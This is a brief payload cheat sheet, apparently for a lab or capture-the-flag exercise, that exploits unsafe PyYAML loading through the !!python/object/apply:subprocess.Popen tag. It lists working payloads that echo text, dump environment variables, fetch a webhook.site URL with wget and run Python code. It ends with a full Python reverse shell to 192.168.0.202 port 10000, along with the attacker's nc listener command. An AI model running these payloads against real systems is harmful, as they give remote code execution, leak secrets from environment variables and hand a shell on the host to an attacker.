### hello world!
- !!python/object/apply:subprocess.Popen [[echo, hello world!]]


### environment variables
- !!python/object/apply:subprocess.Popen [[env]]


### hitting a webhook
- !!python/object/apply:subprocess.Popen [['wget', 'https://webhook.site/TODO/']]


### use python
- !!python/object/apply:subprocess.Popen [['python', '-c', 'print("hello")']]


### reverse shell
# on the attacker machine
nc -lvnp 10000

# on the webpage (TODO: update IP)
- !!python/object/apply:subprocess.Popen [['python', '-c', 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.202",10000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")']]




